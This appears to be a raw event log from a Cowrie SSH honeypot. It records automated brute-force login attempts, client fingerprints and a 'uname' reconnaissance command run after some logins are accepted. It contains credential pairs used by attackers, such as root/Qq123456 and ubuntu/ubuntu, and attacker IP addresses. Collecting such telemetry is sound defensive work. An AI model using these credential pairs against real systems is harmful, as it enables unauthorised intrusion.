{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.386038Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.525287Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:40:52.615632Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.616335Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.653574Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:52.654724Z","src_ip":"83.168.105.65","session":"23af993d4ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58840,"dst_ip":"1.2.3.4","dst_port":22,"session":"b27357cf8be2","protocol":"ssh","message":"New connection: 212.227.125.160:58840 (1.2.3.4:22) [session: b27357cf8be2]","sensor":"my-vps","timestamp":"2025-08-26T11:40:55.984511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:55.985388Z","src_ip":"212.227.125.160","session":"b27357cf8be2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:56.035252Z","src_ip":"212.227.125.160","session":"b27357cf8be2"}
{"eventid":"cowrie.login.failed","username":"gitlab-psql","password":"gitlab-psql","message":"login attempt [gitlab-psql/gitlab-psql] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:56.189981Z","src_ip":"212.227.125.160","session":"b27357cf8be2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:57.309659Z","src_ip":"212.227.125.160","session":"b27357cf8be2"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":56070,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3393a9b0b63","protocol":"ssh","message":"New connection: 45.88.8.215:56070 (1.2.3.4:22) [session: b3393a9b0b63]","sensor":"my-vps","timestamp":"2025-08-26T11:40:58.606454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:58.912961Z","src_ip":"45.88.8.215","session":"b3393a9b0b63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:58.913619Z","src_ip":"45.88.8.215","session":"b3393a9b0b63"}
{"eventid":"cowrie.login.success","username":"root","password":"Mannan@123","message":"login attempt [root/Mannan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:41:00.138622Z","src_ip":"45.88.8.215","session":"b3393a9b0b63"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:00.425462Z","src_ip":"45.88.8.215","session":"b3393a9b0b63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59610,"dst_ip":"1.2.3.4","dst_port":22,"session":"794d831e6da6","protocol":"ssh","message":"New connection: 212.227.125.160:59610 (1.2.3.4:22) [session: 794d831e6da6]","sensor":"my-vps","timestamp":"2025-08-26T11:41:02.014340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:02.015388Z","src_ip":"212.227.125.160","session":"794d831e6da6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:02.064838Z","src_ip":"212.227.125.160","session":"794d831e6da6"}
{"eventid":"cowrie.login.failed","username":"jiffyapp-usr","password":"jiffyapp-usr","message":"login attempt [jiffyapp-usr/jiffyapp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:02.219524Z","src_ip":"212.227.125.160","session":"794d831e6da6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:03.271604Z","src_ip":"212.227.125.160","session":"794d831e6da6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":38270,"dst_ip":"1.2.3.4","dst_port":22,"session":"885ea2f111b7","protocol":"ssh","message":"New connection: 83.168.105.65:38270 (1.2.3.4:22) [session: 885ea2f111b7]","sensor":"my-vps","timestamp":"2025-08-26T11:41:07.943322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:07.944951Z","src_ip":"83.168.105.65","session":"885ea2f111b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:07.985243Z","src_ip":"83.168.105.65","session":"885ea2f111b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60380,"dst_ip":"1.2.3.4","dst_port":22,"session":"fadb8b74ef89","protocol":"ssh","message":"New connection: 212.227.125.160:60380 (1.2.3.4:22) [session: fadb8b74ef89]","sensor":"my-vps","timestamp":"2025-08-26T11:41:08.063061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:08.064025Z","src_ip":"212.227.125.160","session":"fadb8b74ef89"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:08.112024Z","src_ip":"83.168.105.65","session":"885ea2f111b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:08.113643Z","src_ip":"212.227.125.160","session":"fadb8b74ef89"}
{"eventid":"cowrie.login.failed","username":"sadmin","password":"sadmin","message":"login attempt [sadmin/sadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:08.281083Z","src_ip":"212.227.125.160","session":"fadb8b74ef89"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:09.154372Z","src_ip":"83.168.105.65","session":"885ea2f111b7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:09.333750Z","src_ip":"212.227.125.160","session":"fadb8b74ef89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32914,"dst_ip":"1.2.3.4","dst_port":22,"session":"52edee3f738c","protocol":"ssh","message":"New connection: 212.227.125.160:32914 (1.2.3.4:22) [session: 52edee3f738c]","sensor":"my-vps","timestamp":"2025-08-26T11:41:13.402269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:13.402985Z","src_ip":"212.227.125.160","session":"52edee3f738c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:13.470943Z","src_ip":"212.227.125.160","session":"52edee3f738c"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:13.634741Z","src_ip":"212.227.125.160","session":"52edee3f738c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:14.831169Z","src_ip":"212.227.125.160","session":"52edee3f738c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33688,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0b07b9ba645","protocol":"ssh","message":"New connection: 212.227.125.160:33688 (1.2.3.4:22) [session: a0b07b9ba645]","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.137481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.151006Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.198795Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.426970Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:41:19.613492Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.614254Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.666686Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:19.667923Z","src_ip":"212.227.125.160","session":"a0b07b9ba645"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":49294,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b3552049306","protocol":"ssh","message":"New connection: 83.168.105.65:49294 (1.2.3.4:22) [session: 5b3552049306]","sensor":"my-vps","timestamp":"2025-08-26T11:41:23.524820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:23.525853Z","src_ip":"83.168.105.65","session":"5b3552049306"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:41:23.562287Z","src_ip":"83.168.105.65","session":"5b3552049306"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T11:41:23.672055Z","src_ip":"83.168.105.65","session":"5b3552049306"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:41:24.711198Z","src_ip":"83.168.105.65","session":"5b3552049306"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34458,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b7fe9bae674","protocol":"ssh","message":"New connection: 212.227.125.160:34458 (1.2.3.4:22) [session: 0b7fe9bae674]","sensor":"my-vps","timestamp":"2025-08-26T11:41:24.895567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:41:24.896357Z","src_ip":"212.227.125.160","session":"0b7fe9bae674"}
